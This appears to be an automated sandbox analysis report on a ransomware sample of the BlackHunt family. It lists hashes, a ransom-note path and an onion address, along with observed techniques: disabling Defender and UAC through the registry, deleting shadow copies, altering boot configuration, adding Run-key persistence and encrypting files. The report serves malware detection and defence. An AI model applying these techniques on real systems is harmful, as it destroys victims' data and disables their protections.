Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
171s -
max time network
60s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:57
Static task
static1
Behavioral task
behavioral1
Sample
cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe
Resource
win10v2004-20231222-en
General
-
Target
cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe
-
Size
707KB
-
MD5
e38a2e6d7f1299ed0ec3877772551244
-
SHA1
23625745a4f062c96bfbedbe952d9b76e9422f78
-
SHA256
cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807
-
SHA512
15baf39d5b36c4cc295450795304998dba60beeafb5c8c06efe9225a5fbedf185b6a4cbd0a240d03a81713ad5f9908f828ec2c9ac157c30fa85addad427c12e9
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1z8Lvnh:6uaTmkZJ+naie5OTamgEoKxLWSbh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2192 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1984 bcdedit.exe 2636 bcdedit.exe -
Renames multiple (2373) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2572 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\I: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\O: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\L: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\A: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\H: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\K: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\N: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\J: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\Y: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\U: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\M: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\R: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\S: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\G: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\P: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\Z: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\X: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\V: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\E: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\T: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\B: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationUp_ButtonGraphic.png cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page_PAL.wmv cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask_PAL.wmv cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vincennes cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuching cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047x576black.png cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground_PAL.wmv cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2852 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2708 vssadmin.exe 664 vssadmin.exe 1920 vssadmin.exe 2360 vssadmin.exe 2748 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" vssadmin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon vssadmin.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeRestorePrivilege 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeBackupPrivilege 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeTakeOwnershipPrivilege 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeAuditPrivilege 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeSecurityPrivilege 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeIncBasePriorityPrivilege 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeBackupPrivilege 2684 vssvc.exe Token: SeRestorePrivilege 2684 vssvc.exe Token: SeAuditPrivilege 2684 vssvc.exe Token: SeBackupPrivilege 1048 wbengine.exe Token: SeRestorePrivilege 1048 wbengine.exe Token: SeSecurityPrivilege 1048 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2232 wrote to memory of 3064 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 134 PID 2232 wrote to memory of 3064 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 134 PID 2232 wrote to memory of 3064 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 134 PID 2232 wrote to memory of 3064 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 134 PID 2232 wrote to memory of 3056 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 32 PID 2232 wrote to memory of 3056 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 32 PID 2232 wrote to memory of 3056 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 32 PID 2232 wrote to memory of 3056 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 32 PID 2232 wrote to memory of 2688 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 33 PID 2232 wrote to memory of 2688 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 33 PID 2232 wrote to memory of 2688 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 33 PID 2232 wrote to memory of 2688 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 33 PID 2232 wrote to memory of 2572 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 144 PID 2232 wrote to memory of 2572 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 144 PID 2232 wrote to memory of 2572 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 144 PID 2232 wrote to memory of 2572 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 144 PID 2232 wrote to memory of 2848 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 38 PID 2232 wrote to memory of 2848 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 38 PID 2232 wrote to memory of 2848 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 38 PID 2232 wrote to memory of 2848 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 38 PID 2232 wrote to memory of 2600 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 40 PID 2232 wrote to memory of 2600 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 40 PID 2232 wrote to memory of 2600 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 40 PID 2232 wrote to memory of 2600 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 40 PID 3056 wrote to memory of 2588 3056 cmd.exe 42 PID 3056 wrote to memory of 2588 3056 cmd.exe 42 PID 3056 wrote to memory of 2588 3056 cmd.exe 42 PID 2232 wrote to memory of 2248 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 41 PID 2232 wrote to memory of 2248 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 41 PID 2232 wrote to memory of 2248 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 41 PID 2232 wrote to memory of 2248 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 41 PID 2232 wrote to memory of 2728 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 46 PID 2232 wrote to memory of 2728 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 46 PID 2232 wrote to memory of 2728 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 46 PID 2232 wrote to memory of 2728 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 46 PID 3064 wrote to memory of 2676 3064 reg.exe 136 PID 3064 wrote to memory of 2676 3064 reg.exe 136 PID 3064 wrote to memory of 2676 3064 reg.exe 136 PID 2232 wrote to memory of 2576 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 50 PID 2232 wrote to memory of 2576 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 50 PID 2232 wrote to memory of 2576 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 50 PID 2232 wrote to memory of 2576 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 50 PID 2232 wrote to memory of 1800 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 47 PID 2232 wrote to memory of 1800 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 47 PID 2232 wrote to memory of 1800 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 47 PID 2232 wrote to memory of 1800 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 47 PID 2232 wrote to memory of 2236 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 54 PID 2232 wrote to memory of 2236 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 54 PID 2232 wrote to memory of 2236 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 54 PID 2232 wrote to memory of 2236 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 54 PID 2688 wrote to memory of 2132 2688 cmd.exe 55 PID 2688 wrote to memory of 2132 2688 cmd.exe 55 PID 2688 wrote to memory of 2132 2688 cmd.exe 55 PID 2232 wrote to memory of 2340 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 53 PID 2232 wrote to memory of 2340 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 53 PID 2232 wrote to memory of 2340 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 53 PID 2232 wrote to memory of 2340 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 53 PID 2232 wrote to memory of 2608 2232 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 56 PID 2232 wrote to memory of 2608 2232 